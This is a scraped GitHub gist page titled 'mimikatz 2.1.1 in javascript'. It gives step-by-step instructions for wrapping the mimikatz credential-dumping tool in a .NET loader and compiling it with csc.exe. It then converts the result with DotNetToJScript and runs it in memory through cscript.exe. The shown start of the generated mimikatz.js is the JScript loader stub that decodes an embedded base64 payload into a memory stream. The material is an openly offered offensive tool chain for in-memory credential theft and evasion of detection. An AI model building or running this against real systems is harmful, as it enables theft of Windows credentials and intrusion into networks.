Forked from pljoel/Instructions-to-mimikatz-js.txt
Created
November 25, 2019 10:46
-
-
Save gattacker/338f3b02a3fbe04e0ed1dc0a35fb000f to your computer and use it in GitHub Desktop.
mimikatz 2.1.1 in javascript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| It is basically a wrap of the following projects: | |
| - mimikatz (https://github.com/gentilkiwi/mimikatz) | |
| - mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7) | |
| Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863) | |
| - DotNetToJScript (https://github.com/tyranid/DotNetToJScript) | |
| INSTRUCTIONS: | |
| 1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
| 2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though) | |
| b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it | |
| c) Comment back the lines helping to make file.b64 | |
| d) In order to help DotNetToJscript add the following lines to the end of katz.cs: | |
| public class TestClass | |
| { | |
| public TestClass() | |
| { | |
| /* Start katz */ | |
| Delivery.Program.Main(); | |
| } | |
| } | |
| e) Make an .exe : | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs | |
| 3. a) Build DotNetToJScript project. Note: You don't need to build 'ExampleAssembly' project | |
| b) Create mimikatz.js using DotNetToJScript you just built and katz.exe you built on step 2: | |
| C:\< path to DotNetToJScript >\DotNetToJScript.exe -o mimikatz.js -ver auto C:\< path to katz >\katz.exe | |
| 4. Launch mimikatz in-memory using javascript: | |
| cscript.exe .\mimikatz.js | |
| Joel Perron-Langlois (github: https://github.com/pljoel) |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function setversion() { | |
| var shell = new ActiveXObject('WScript.Shell'); | |
| ver = 'v4.0.30319'; | |
| try { | |
| shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\'); | |
| } catch(e) { | |
| ver = 'v2.0.50727'; | |
| } | |
| shell.Environment('Process')('COMPLUS_Version') = ver; | |
| } | |
| function debug(s) {WScript.Echo(s)} | |
| function base64ToStream(b) { | |
| var enc = new ActiveXObject("System.Text.ASCIIEncoding"); | |
| var length = enc.GetByteCount_2(b); | |
| var ba = enc.GetBytes_4(b); | |
| var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); | |
| ba = transform.TransformFinalBlock(ba, 0, length); | |
| var ms = new ActiveXObject("System.IO.MemoryStream"); | |
| ms.Write(ba, 0, (length / 4) * 3); | |
| ms.Position = 0; | |
| return ms; | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment